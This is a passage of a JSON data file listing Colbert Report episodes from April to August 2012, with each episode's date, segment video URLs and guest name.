      "guest": "Don McLeroy"
    },
    {
      "date": "2012-04-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ly3so2/super-tuesday-ii--election-boogaloo---death-match-in-hellaware",
        "http://thecolbertreport.cc.com/videos/xmivrq/-i-am-a-pole--and-so-can-you---",
        "http://thecolbertreport.cc.com/videos/i4eh7r/canada-s-currency-coup",
        "http://thecolbertreport.cc.com/videos/ycnifi/magnus-carlsen",
        "http://thecolbertreport.cc.com/videos/cfkek7/sign-off---ipad"
      ],
      "guest": "Magnus Carlsen"
    },
    {
      "date": "2012-04-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/et0kro/intro---4-25-12",
        "http://thecolbertreport.cc.com/videos/or4jr5/nasa-retires-discovery---drops-spacebook",
        "http://thecolbertreport.cc.com/videos/6xkuod/the-word---united-we-can-t-stand-them",
        "http://thecolbertreport.cc.com/videos/gi36k3/cheating-death---crash-diet-feeding-tubes---scrotum-gel-injections",
        "http://thecolbertreport.cc.com/videos/88pieq/michael-sandel",
        "http://thecolbertreport.cc.com/videos/wduflz/sign-off---goodnight"
      ],
      "guest": "Michael Sandel"
    },
    {
      "date": "2012-04-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xrzvpm/intro---4-26-12",
        "http://thecolbertreport.cc.com/videos/9rs6oa/barack-obama-s-slow-jam-backlash",
        "http://thecolbertreport.cc.com/videos/2w9amu/colbert-super-pac---super-fun-pack-1st-treasure-hunt-clue",
        "http://thecolbertreport.cc.com/videos/1ytfce/jack-white",
        "http://thecolbertreport.cc.com/videos/kymj2z/sign-off---montclair-film-festival"
      ],
      "guest": "Jack White"
    },
    {
      "date": "2012-04-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l8r5un/intro---4-30-12",
        "http://thecolbertreport.cc.com/videos/u2x3gk/delicate-advice-for-chen-guangcheng",
        "http://thecolbertreport.cc.com/videos/g6gv3q/the-word---don-t-ask--don-t-show---tell",
        "http://thecolbertreport.cc.com/videos/z2rpip/concealing-weapons-in-style",
        "http://thecolbertreport.cc.com/videos/csg3jo/diane-keaton",
        "http://thecolbertreport.cc.com/videos/tly3vi/sign-off---stephen-s-fashionable-firearm"
      ],
      "guest": "Diane Keaton"
    },
    {
      "date": "2012-05-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8gt820/intro---5-1-12",
        "http://thecolbertreport.cc.com/videos/pktymf/barack-obama---the-anniversary-of-bin-laden-s-assassination",
        "http://thecolbertreport.cc.com/videos/0zj7f4/paul-ryan-s-christian-budget-cuts",
        "http://thecolbertreport.cc.com/videos/7af7jl/paul-ryan-s-christian-budget-cuts---thomas-reese",
        "http://thecolbertreport.cc.com/videos/cpb2np/carne-ross",
        "http://thecolbertreport.cc.com/videos/a9ioqx/sign-off---goodnight"
      ],
      "guest": "Carne Ross"
    },
    {
      "date": "2012-05-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jciyto/intro---5-2-12",
        "http://thecolbertreport.cc.com/videos/n232ru/richard-branson-shaped-ice-cubes",
        "http://thecolbertreport.cc.com/videos/goj2h9/the-word---debt-panels",
        "http://thecolbertreport.cc.com/videos/sv3iag/kermit-the-frog-s-german-tv-offense---hans-beinholtz",
        "http://thecolbertreport.cc.com/videos/luw0ia/jonathan-haidt",
        "http://thecolbertreport.cc.com/videos/k7vmo6/sign-off---stephen-colbert-s-6000k-norway-norwalkathon"
      ],
      "guest": "Jonathan Haidt"
    },
    {
      "date": "2012-05-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/msaxn6/newt-gingrich---mitt-romney-alliance-analogies",
        "http://thecolbertreport.cc.com/videos/eki0dc/colbert-super-pac---in-search-of-mr--larose",
        "http://thecolbertreport.cc.com/videos/2v2ixr/who-s-honoring-me-now----national-space-society---buzz-aldrin",
        "http://thecolbertreport.cc.com/videos/z3ac6o/lena-dunham",
        "http://thecolbertreport.cc.com/videos/1iw8uv/sign-off---2012-space-pioneer-award-for-mass-media"
      ],
      "guest": "Lena Dunham"
    },
    {
      "date": "2012-05-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1jhhu2/uncensored---maurice-sendak-tribute----i-am-a-pole--and-so-can-you----release",
        "http://thecolbertreport.cc.com/videos/feswk7/intro---5-7-12",
        "http://thecolbertreport.cc.com/videos/d6nh6o/hand-disinfectant-drunk-teens",
        "http://thecolbertreport.cc.com/videos/d69ur0/joe-biden-s-same-sex-marriage-gaffe",
        "http://thecolbertreport.cc.com/videos/fplvtb/-pussy-hound--with-eric-mccormack",
        "http://thecolbertreport.cc.com/videos/jrnml0/threatdown---newscasting-bears",
        "http://thecolbertreport.cc.com/videos/u65qci/andy-cohen",
        "http://thecolbertreport.cc.com/videos/xh5269/sign-off---sound-effects-box"
      ],
      "guest": "Andy Cohen"
    },
    {
      "date": "2012-05-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/p05t1b/colbert-super-pac-shh----corporate-campaign-players---super-secret--spooky-pacs-",
        "http://thecolbertreport.cc.com/videos/b2tfg8/anonymous-attack-ads---claire-mccaskill",
        "http://thecolbertreport.cc.com/videos/ad10bn/michelle-alexander",
        "http://thecolbertreport.cc.com/videos/dsprai/sign-off----i-am-a-pole--and-so-can-you---"
      ],
      "guest": "Michelle Alexander"
    },
    {
      "date": "2012-05-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v1k3ci/mexico-s-debate-playmate",
        "http://thecolbertreport.cc.com/videos/b6tiga/barack-obama-vs--north-carolina-on-gay-marriage",
        "http://thecolbertreport.cc.com/videos/t3omhb/jon-mcnaughton-s--nation-under-socialism--artwork",
        "http://thecolbertreport.cc.com/videos/o2c49w/anna-wintour",
        "http://thecolbertreport.cc.com/videos/bogip6/sign-off----i-am-a-pole--and-so-can-you----audiobook"
      ],
      "guest": "Anna Wintour"
    },
    {
      "date": "2012-05-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6cwgo2/intro---5-10-12",
        "http://thecolbertreport.cc.com/videos/7lnqh4/mother-s-day-shout-out",
        "http://thecolbertreport.cc.com/videos/n27g4x/barack-obama-s-gay-blasphemy",
        "http://thecolbertreport.cc.com/videos/b9m4e5/threatdown---interdimensional-black-people--gay-strokes---manipulative-sicko-monkeys",
        "http://thecolbertreport.cc.com/videos/ytlc6i/wisconsin-s-fake-democrats",
        "http://thecolbertreport.cc.com/videos/v6gyoh/francis-collins",
        "http://thecolbertreport.cc.com/videos/vbl44w/sign-off---two-weeks-off---dry-roasted-peanuts"
      ],
      "guest": "Dr. Francis Collins"
    },
    {
      "date": "2012-05-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hx8ph7/intro---5-29-12",
        "http://thecolbertreport.cc.com/videos/cpgg7x/who-s-honoring-me-now----peabody-awards---maxim-s-hot-100",
        "http://thecolbertreport.cc.com/videos/oo0mhd/donald-trump-s-creative-truth---mitt-romney-s-poll-numbers",
        "http://thecolbertreport.cc.com/videos/cw4fxf/un-american-news---egypt-s-presidential-elections",
        "http://thecolbertreport.cc.com/videos/32y78g/charlize-theron",
        "http://thecolbertreport.cc.com/videos/gr0i67/sign-off---goodnight"
      ],
      "guest": "Charlize Theron"
    },
    {
      "date": "2012-05-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u7h1f8/intro---5-30-12",
        "http://thecolbertreport.cc.com/videos/kydmtj/mexico-s-drug---potato-chip-wars",
        "http://thecolbertreport.cc.com/videos/s73hgy/robert-mugabe-s-u-n--tourism-tribute",
        "http://thecolbertreport.cc.com/videos/dfm2k1/alan-alda",
        "http://thecolbertreport.cc.com/videos/b6lw83/sign-off---stephen-s-matchbox"
      ],
      "guest": "Alan Alda"
    },
    {
      "date": "2012-05-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/y3bfh6/buy-best-selling--i-am-a-pole--and-so-can-you---",
        "http://thecolbertreport.cc.com/videos/sib2qy/barack-obama-s-righteous-drone-strikes",
        "http://thecolbertreport.cc.com/videos/s3t2y6/the-word---two-birds-with-one-drone",
        "http://thecolbertreport.cc.com/videos/pufh72/michael-bloomberg-s-super-sized-soda-scheme",
        "http://thecolbertreport.cc.com/videos/pz3adl/jack-hitt",
        "http://thecolbertreport.cc.com/videos/e9e1b2/sign-off---welcome-baby-gwinn-"
      ],
      "guest": "Jack Hitt"
    },
    {
      "date": "2012-06-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nhsal8/juvenile-speeches-from-congress---president-sparkle-talk",
        "http://thecolbertreport.cc.com/videos/w6itwj/the-word---sink-or-swim",
        "http://thecolbertreport.cc.com/videos/r7x6me/better-know-a-district---represent-o-map-6000---georgia-s-5th",
        "http://thecolbertreport.cc.com/videos/cx6fmy/john-lewis",
        "http://thecolbertreport.cc.com/videos/5u46bt/sign-off---goodnight"
      ],
      "guest": "Rep. John Lewis"
    },
    {
      "date": "2012-06-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lg5ugg/intro---6-5-12",
        "http://thecolbertreport.cc.com/videos/xt64qc/cdc-zombie-apocalypse-statement",
        "http://thecolbertreport.cc.com/videos/w4utag/tip-wag---japanese-diet-goggles--u-s--sperm-exports---taxidermied-toys",
        "http://thecolbertreport.cc.com/videos/kkce78/self-marriage-problems",
        "http://thecolbertreport.cc.com/videos/90ifev/jill-biden",
        "http://thecolbertreport.cc.com/videos/hhgz9k/sign-off---goodnight"
      ],
      "guest": "Jill Biden"
    },
    {
      "date": "2012-06-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ta5d10/transit-of-venus---mars-reality-show-pitch",
        "http://thecolbertreport.cc.com/videos/y1zpiy/wisconsin-s-recall-results",
        "http://thecolbertreport.cc.com/videos/0vve8r/difference-makers---larry-johnson",
        "http://thecolbertreport.cc.com/videos/pqv8yf/neil-patrick-harris",
        "http://thecolbertreport.cc.com/videos/1n5kn0/sign-off---ray-bradbury-tribute"
      ],
      "guest": "Neil Patrick Harris"
    },
    {
      "date": "2012-06-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2l9h7f/intro---6-7-12",
        "http://thecolbertreport.cc.com/videos/n107py/corruption-on-pakistan-s--sesame-street-",
        "http://thecolbertreport.cc.com/videos/5zzgas/the-new-york-times--hit-job-on-mitt-romney",
        "http://thecolbertreport.cc.com/videos/mlqu18/a-teacup-pig---partisan-politics",
        "http://thecolbertreport.cc.com/videos/gfpnqx/regina-spektor",
        "http://thecolbertreport.cc.com/videos/8x9qre/colbert-super-pac---super-fun-pack-treasure-hunt-clue"
      ],
      "guest": "Regina Spektor"
    },
    {
      "date": "2012-06-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8zxgdh/neil-degrasse-tyson-on--prometheus--gaffe",
        "http://thecolbertreport.cc.com/videos/4dkvt6/radical-feminist-nuns",
        "http://thecolbertreport.cc.com/videos/u1f5qa/radical-feminist-nuns---simone-campbell",
        "http://thecolbertreport.cc.com/videos/beuiqq/-banana-bunker--tutorial",
        "http://thecolbertreport.cc.com/videos/0lbz7s/martin-sheen",
        "http://thecolbertreport.cc.com/videos/h1jqol/sign-off---wooden-ruler"
      ],
      "guest": "Martin Sheen"
    },
    {
      "date": "2012-06-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/syl8av/intro---6-12-12",
        "http://thecolbertreport.cc.com/videos/4p817x/mitt-romney-s-blue-collar-equestrian-pastime",
        "http://thecolbertreport.cc.com/videos/nu56lh/barack-obama-s-anti-terror-leaks",
        "http://thecolbertreport.cc.com/videos/dfjz7v/barack-obama-s-jobs-gaffe---mitt-romney-s-courageous-comeback",
        "http://thecolbertreport.cc.com/videos/e4m68b/operation-artificial-swedener",
        "http://thecolbertreport.cc.com/videos/eici19/will-allen",
        "http://thecolbertreport.cc.com/videos/uaovz2/sign-off---stephen-s-equestrian-display"
      ],
      "guest": "Will Allen"
    },
    {
      "date": "2012-06-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f93cwg/high-wire-walk-over-niagara-falls",
        "http://thecolbertreport.cc.com/videos/e61ypw/the-word---free-lunch",
        "http://thecolbertreport.cc.com/videos/clm6h7/the-enemy-within---apes-armed-with-ipads",
        "http://thecolbertreport.cc.com/videos/0nbwzv/gregg-allman",
        "http://thecolbertreport.cc.com/videos/0bcb4l/sign-off---goodnight"
      ],
      "guest": "Gregg Allman"
    },
    {
      "date": "2012-06-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wdhef3/marijuana-legalization-as-election-hot-button-issue",
        "http://thecolbertreport.cc.com/videos/zy2va1/super-pac-super-cash---24-hour-political-ad-channels",
        "http://thecolbertreport.cc.com/videos/a5uuwa/cheating-death---penis-curvature-cures---single-women-sleep-aids",
        "http://thecolbertreport.cc.com/videos/jylspq/steve-coll",
        "http://thecolbertreport.cc.com/videos/nw9c2r/sign-off---bon-voyage--peter-gwinn"
      ],
      "guest": "Steve Coll"
    },
    {
      "date": "2012-06-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/34ngb2/intro---6-18-12",
        "http://thecolbertreport.cc.com/videos/c3nu3d/barack-obama-s-immigration-policy-change",
        "http://thecolbertreport.cc.com/videos/z9bjae/press-interruption-at-barack-obama-s-immigration-address",
        "http://thecolbertreport.cc.com/videos/f3coxy/operation-artificial-swedener---sweden-s-response",
        "http://thecolbertreport.cc.com/videos/x4uwku/paul-krugman",
        "http://thecolbertreport.cc.com/videos/fdw0ht/sign-off---goodnight"
      ],
      "guest": "Paul Krugman"
    },
    {
      "date": "2012-06-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0r91gj/john-kerry-as-mitt-romney-in-debate-prep",
        "http://thecolbertreport.cc.com/videos/zxypkl/mitt-romney-s-champion-horse---dressage-tribute",
        "http://thecolbertreport.cc.com/videos/ugscr4/unscooped-dog-poop-crimes",
        "http://thecolbertreport.cc.com/videos/xdevam/olivia-wilde",
        "http://thecolbertreport.cc.com/videos/kada0a/sign-off---stephen-s-dressage-dance"
      ],
      "guest": "Olivia Wilde"
    },
    {
      "date": "2012-06-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6q5qvo/intro---6-20-12",
        "http://thecolbertreport.cc.com/videos/w6vibi/asian-immigration-threat",
        "http://thecolbertreport.cc.com/videos/95tn0n/unraveling-the-operation-fast---furious-scandal",
        "http://thecolbertreport.cc.com/videos/b65og2/joe-the-plumber-s-controversial-gun-control-ad",
        "http://thecolbertreport.cc.com/videos/4h0l60/thought-for-food---doritos-tacos---flavorlopes",
        "http://thecolbertreport.cc.com/videos/lwb6am/daniel-klaidman",
        "http://thecolbertreport.cc.com/videos/31ptzz/sign-off---goodnight"
      ],
      "guest": "Daniel Klaidman"
    },
    {
      "date": "2012-06-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7r29kf/egypt-s-presidential-election---hosni-mubarak-s-health",
        "http://thecolbertreport.cc.com/videos/zdprqc/threatdown---sicko-penguins--stoner-babies---terrorist-furniture",
        "http://thecolbertreport.cc.com/videos/5yjil8/operation-artificial-swedener---c-mon-sweden--take-a-chance-on-stephen",
        "http://thecolbertreport.cc.com/videos/e6ik9l/lawrence-krauss",
        "http://thecolbertreport.cc.com/videos/e8ivor/sign-off----a-universe-from-nothing-"
      ],
      "guest": "Lawrence Krauss"
    },
    {
      "date": "2012-06-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ylc1ta/intro---6-25-12",
        "http://thecolbertreport.cc.com/videos/cbsvdk/colbert-news-alert---obamacare-supreme-court-ruling",
        "http://thecolbertreport.cc.com/videos/wn3vzl/colbert-news-alert---obamacare-supreme-court-ruling---richard-mourdock-s-responses",
        "http://thecolbertreport.cc.com/videos/1nhpf3/the-word---silver-maligning",
        "http://thecolbertreport.cc.com/videos/0u5f3i/i-s-on-edjukashun---study-drugs",
        "http://thecolbertreport.cc.com/videos/2q2di6/frank-deford",
        "http://thecolbertreport.cc.com/videos/wri423/sign-off---five-finger-fillet"
      ],
      "guest": "Frank Deford"
    },
    {
      "date": "2012-06-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ifbnsf/intro---6-26-12",
        "http://thecolbertreport.cc.com/videos/8wlx7c/supreme-court-ruling-on-arizona-immigration-policy",
        "http://thecolbertreport.cc.com/videos/06bwvh/tip-wag---pixar-s-gay-agenda--america-s-obesity---adidas-shackle-sneakers",
        "http://thecolbertreport.cc.com/videos/ohfzqq/dish-network-s-autohop-service",
        "http://thecolbertreport.cc.com/videos/r8iy26/richard-ford",
        "http://thecolbertreport.cc.com/videos/ybvbi1/sign-off---goodnight"
      ],
      "guest": "Richard Ford"
    },
    {
      "date": "2012-06-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g8onr9/colbert-super-pac-treasure-hunt-solution",
        "http://thecolbertreport.cc.com/videos/gl54n8/mitt-romney-s-victory-retreat---democrats--convention-deficit",
        "http://thecolbertreport.cc.com/videos/t2x64z/national-geographic-poll-on-alien-invasion-management",
        "http://thecolbertreport.cc.com/videos/td6pu4/blood-in-the-water---mike-turzai-s-voter-id-remarks",
        "http://thecolbertreport.cc.com/videos/5em8r3/rainbow-stuffed-gay-pride-oreo",
        "http://thecolbertreport.cc.com/videos/aj465n/melinda-gates",
        "http://thecolbertreport.cc.com/videos/bxvxkj/sign-off---oreo-cookie-plate"
      ],
      "guest": "Melinda Gates"
    },
    {
      "date": "2012-06-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/coii6k/cable-news-gaffe-on-obamacare-supreme-court-ruling",
        "http://thecolbertreport.cc.com/videos/p7wwtp/john-roberts--obamacare-swing-vote",
        "http://thecolbertreport.cc.com/videos/n5b9bc/obamacare---the-broccoli-argument",
        "http://thecolbertreport.cc.com/videos/xqmuun/obamacare---the-broccoli-argument---emily-bazelon",
        "http://thecolbertreport.cc.com/videos/843q05/aaron-sorkin",
        "http://thecolbertreport.cc.com/videos/hdpyh9/colbert-super-pac---super-fun-pack-treasure-finder"
      ],
      "guest": "Aaron Sorkin"
    },
    {
      "date": "2012-07-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rkamql/intro---7-16-12",
        "http://thecolbertreport.cc.com/videos/nw0ci8/tomkat-s-divorce---anderson-cooper-s-sexual-orientation",
        "http://thecolbertreport.cc.com/videos/xmrkal/mitt-romney-s-retroactive-retirement-from-bain-capital",
        "http://thecolbertreport.cc.com/videos/hs3epw/thought-for-food---caffeine-edition---funeral-home-starbucks---car-coffee-makers",
        "http://thecolbertreport.cc.com/videos/gxb8p4/anne-marie-slaughter",
        "http://thecolbertreport.cc.com/videos/nj5kky/sign-off---smiles-or-whatever"
      ],
      "guest": "Anne-Marie Slaughter"
    },
    {
      "date": "2012-07-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5r1yvx/nevada-s--none-of-the-above--is-fearsome-foe-for-gop",
        "http://thecolbertreport.cc.com/videos/577ry9/the-word---on-the-straight---narrow-minded",
        "http://thecolbertreport.cc.com/videos/xrrg9u/who-s-honoring-me-now----philadelphia-s-rosenbach-museum-and-library",
        "http://thecolbertreport.cc.com/videos/8qe1km/nas"
      ],
      "guest": "Nas"
    },
    {
      "date": "2012-07-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xiottz/intro---7-18-12",
        "http://thecolbertreport.cc.com/videos/jhpgom/-struggling--waiters---waitresses-at-mitt-romney-s-fundraiser",
        "http://thecolbertreport.cc.com/videos/40x15i/tip-wag---christian-tablet-computer---rock-paper-scissors-robot",
        "http://thecolbertreport.cc.com/videos/5qgquz/stephen-colbert-s-metunes---def-leppard-s--forgeries--of-old-hits",
        "http://thecolbertreport.cc.com/videos/67w2nh/annise-parker",
        "http://thecolbertreport.cc.com/videos/2wz88p/sign-off---goodnight"
      ],
      "guest": "Mayor Annise D. Parker"
    },
    {
      "date": "2012-07-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h8wtk8/fred-willard-arrested-for-lewd-conduct",
        "http://thecolbertreport.cc.com/videos/64cfhk/libor-interest-rate-scandal",
        "http://thecolbertreport.cc.com/videos/7dpxne/libor-interest-rate-scandal---dave-leonhardt",
        "http://thecolbertreport.cc.com/videos/uknspr/canada-s-economic-growth-despite-melting-currency",
        "http://thecolbertreport.cc.com/videos/xfd2bp/lisa-jackson",
        "http://thecolbertreport.cc.com/videos/iw4bs9/sign-off---goodnight"
      ],
      "guest": "Lisa Jackson"
    },
    {
      "date": "2012-07-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/imdi3o/intro---7-23-12",
        "http://thecolbertreport.cc.com/videos/0xmom4/interview-no-show--mike-tyson",
        "http://thecolbertreport.cc.com/videos/v7f1z0/shepard-smith-s-personal-reporting-style",
        "http://thecolbertreport.cc.com/videos/p2oill/partisan-speculation-over-colorado-shooter",
        "http://thecolbertreport.cc.com/videos/3cxwny/vikram-gandhi",
        "http://thecolbertreport.cc.com/videos/rwkf73/sign-off---goodnight"
      ],
      "guest": "Vikram Gandhi"
    },
    {
      "date": "2012-07-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/knsr5h/intro---7-24-12",
        "http://thecolbertreport.cc.com/videos/h74nmb/hamster-study-links-late-night-tv-with-depression",
        "http://thecolbertreport.cc.com/videos/zxif76/u-s--agriculture---drought-disaster",
        "http://thecolbertreport.cc.com/videos/x2crx4/u-s--agriculture---drought-disaster---bruce-babcock",
        "http://thecolbertreport.cc.com/videos/bov9or/james-fallows",
        "http://thecolbertreport.cc.com/videos/lpy9h0/sign-off---goodnight"
      ],
      "guest": "James Fallows"
    },
    {
      "date": "2012-07-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0mcg76/mitt-romney-s-anglo-saxon-connection",
        "http://thecolbertreport.cc.com/videos/w5w9pn/mitt-romney-vs--barack-obama-on-small-business-owners",
        "http://thecolbertreport.cc.com/videos/x14yw9/the-word---1-man-show",
        "http://thecolbertreport.cc.com/videos/f7r40e/bibles-swapped-for--fifty-shades-of-grey-",
        "http://thecolbertreport.cc.com/videos/4414pc/dan-gross",
        "http://thecolbertreport.cc.com/videos/e1brl1/sign-off---goodnight"
      ],
      "guest": "Dan Gross"
    },
    {
      "date": "2012-07-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vqlxb2/intro---7-26-12",
        "http://thecolbertreport.cc.com/videos/4fk2ow/sport-report---stephen-colbefrajilympic-expealacoverage-",
        "http://thecolbertreport.cc.com/videos/kycpil/mitt-romney-s-london-olympics-blunder",
        "http://thecolbertreport.cc.com/videos/lra5ae/chick-fil-a-s-anti-gay-marriage-announcement",
        "http://thecolbertreport.cc.com/videos/4nngh8/peter-westmacott",
        "http://thecolbertreport.cc.com/videos/ccwpvt/sign-off---colbert-nation-twins"
      ],
      "guest": "Amb. Peter Westmacott"
    },
    {
      "date": "2012-07-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/70ka18/mitt-romney-s-disinterest-in-dressage",
        "http://thecolbertreport.cc.com/videos/lav3uh/stephen-s-dressage-training-pt--1",
        "http://thecolbertreport.cc.com/videos/zdpacy/tony-robbins--signature-firewalk",
        "http://thecolbertreport.cc.com/videos/554xm8/joan-rivers",
        "http://thecolbertreport.cc.com/videos/d69lls/sign-off----i-hate-everyone----starting-with-me-"
      ],
      "guest": "Joan Rivers"
    },
    {
      "date": "2012-07-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d1pkf4/intro---7-31-12",
        "http://thecolbertreport.cc.com/videos/sbevip/rick-gorka-s-press-outburst-in-poland",
        "http://thecolbertreport.cc.com/videos/8qmv9k/rafalca-s-impact-on-mitt-romney-s-vp-pick",
        "http://thecolbertreport.cc.com/videos/f5vsty/stephen-s-dressage-training-pt--2",
        "http://thecolbertreport.cc.com/videos/lfsrga/stephest-colbchella--012---rocktaugustfest",
        "http://thecolbertreport.cc.com/videos/p9ejfs/jeff-koons",
        "http://thecolbertreport.cc.com/videos/e0ikf9/sign-off---goodnight"
      ],
      "guest": "Jeff Koons"
    },
    {
      "date": "2012-08-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fjidln/obama-administration-s-birth-control-mandate",
        "http://thecolbertreport.cc.com/videos/llkyw5/the--fiscal-cliff--conundrum---grover-norquist-s-tax-pledge",
        "http://thecolbertreport.cc.com/videos/u1lf6f/sport-report---stephen-colbefrajilympic-expealacoverage----gymnastics---swimming",
        "http://thecolbertreport.cc.com/videos/gayfdj/john-grunsfeld",
        "http://thecolbertreport.cc.com/videos/gwa2y4/sign-off---totem"
      ],
      "guest": "John Grunsfeld"
    },
    {
      "date": "2012-08-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x1we2u/exclusive---better-know-a-district---missouri-s-3rd-or-1st---russ-carnahan",
        "http://thecolbertreport.cc.com/videos/3wx6bt/rafalca-s-first-day-of-dressage",
        "http://thecolbertreport.cc.com/videos/ql0bqa/nancy-pelosi-s-bkad-pact---the-disclose-act-filibuster",
        "http://thecolbertreport.cc.com/videos/tdj576/better-know-a-district---missouri-s-3rd-or-1st---russ-carnahan",
        "http://thecolbertreport.cc.com/videos/t85slm/thought-for-food---usda-meatless-mondays---plant-communication-research",
        "http://thecolbertreport.cc.com/videos/fyzakp/chris-hayes",
        "http://thecolbertreport.cc.com/videos/m1idm3/sign-off---carrot-nibble"
      ],
      "guest": "Chris Hayes"
    },
    {
      "date": "2012-08-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kz6vda/intro---8-6-12",
        "http://thecolbertreport.cc.com/videos/h9qt0r/mars-rover-landing",
        "http://thecolbertreport.cc.com/videos/w2s6c0/chick-fil-a-appreciation-day",
        "http://thecolbertreport.cc.com/videos/x7yc4w/pete-seeger",
        "http://thecolbertreport.cc.com/videos/aj407y/sign-off----pete-seeger--in-his-own-words-"
      ],
      "guest": "Pete Seeger"
    },
    {
      "date": "2012-08-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1vt8t5/sport-report---stephen-colbefrajilympic-expealacoverage----soft-anti-americanism",
        "http://thecolbertreport.cc.com/videos/k4260i/mitt-romney-s-protective-press-pool---running-mate-clues",
        "http://thecolbertreport.cc.com/videos/q82dz5/steve-king-s-dogfighting-defense",
        "http://thecolbertreport.cc.com/videos/nlroaz/mark-shriver",
        "http://thecolbertreport.cc.com/videos/jx7y7x/sign-off---goodnight"
      ],
      "guest": "Mark Shriver"
    },
    {
      "date": "2012-08-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/23mkh8/intro---8-8-12",
        "http://thecolbertreport.cc.com/videos/4fqxvr/obamacare---pizza-costs",
        "http://thecolbertreport.cc.com/videos/h3tu8s/cheating-death---sensor-enabled-pills---facelift-bungee-cords",
        "http://thecolbertreport.cc.com/videos/zgmish/liza-mundy",
        "http://thecolbertreport.cc.com/videos/d5p8ok/sign-off---vacsa-strap"
      ],
      "guest": "Liza Mundy"
    },
    {
      "date": "2012-08-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8gpwtc/anti-muslim-attack-on-hillary-clinton-aide",
        "http://thecolbertreport.cc.com/videos/sr618c/better-know-a-district---minnesota-s-5th---keith-ellison",
        "http://thecolbertreport.cc.com/videos/zzeqj6/who-s-honoring-me-now----psychonomic-bulletin---review",
        "http://thecolbertreport.cc.com/videos/i891sf/woody-harrelson",
        "http://thecolbertreport.cc.com/videos/nynu71/sign-off---goodnight"
      ],
      "guest": "Woody Harrelson"
    },
    {
      "date": "2012-08-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d4650t/stephest-colbchella--012---welcome-to-rocktaugustfest",
        "http://thecolbertreport.cc.com/videos/6jv3cb/mitt-romney-s-bold-running-mate-pick",
        "http://thecolbertreport.cc.com/videos/wk9zh3/stephest-colbchella--012---fun-",
        "http://thecolbertreport.cc.com/videos/r9jxwl/sign-off---stephest-colbchella--012---t-mobile-goodnight"
      ],
      "guest": "Fun."
    },
    {
      "date": "2012-08-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9sxdgp/stephest-colbchella--012---rocktaugustfest-night-two",
        "http://thecolbertreport.cc.com/videos/ovgwtm/mitt-romney-s---paul-ryan-s-foreign-policy-credentials",
        "http://thecolbertreport.cc.com/videos/ajslu2/-stars-earn-stripes--reality-series",
        "http://thecolbertreport.cc.com/videos/4uk1xx/stephest-colbchella--012---grizzly-bear",
        "http://thecolbertreport.cc.com/videos/1eoihc/sign-off---stephest-colbchella--012---t-mobile-goodnight-auditions"
      ],
      "guest": "Grizzly Bear"
    },
    {
      "date": "2012-08-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jus7dh/exclusive---stephest-colbchella--012---concert-setup-timelapse",
        "http://thecolbertreport.cc.com/videos/lkqb8i/stephest-colbchella--012---rocktaugustfest-night-three",
        "http://thecolbertreport.cc.com/videos/iwgkv9/fierce-five-interns",
        "http://thecolbertreport.cc.com/videos/tzk5xz/stephest-colbchella--012---intrepid-sea--air---space-museum",
        "http://thecolbertreport.cc.com/videos/buxzdm/stephest-colbchella--012---santigold",
        "http://thecolbertreport.cc.com/videos/891lvk/sign-off---stephest-colbchella--012---t-mobile-goodnight-with-grandmaster-flash"
      ],
      "guest": "The U.S. Women's Olympic Gymnastics team, Santigold"
    },
    {
      "date": "2012-08-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bx6qnh/stephest-colbchella--012---rocktaugustfest-night-four",
        "http://thecolbertreport.cc.com/videos/tgqk3o/mitt-romney---paul-ryan---the-dynam-ish-duo",
        "http://thecolbertreport.cc.com/videos/ymbqe6/17th-amendment-under-attack",
        "http://thecolbertreport.cc.com/videos/x5cie8/stephest-colbchella--012---wayne-coyne",
        "http://thecolbertreport.cc.com/videos/ez1hov/sign-off---stephest-colbchella--012---t-mobile-goodnight-in-a-bubble"
      ],
      "guest": "The Flaming Lips"
    },
    {
      "date": "2012-08-28",
      "videos": [
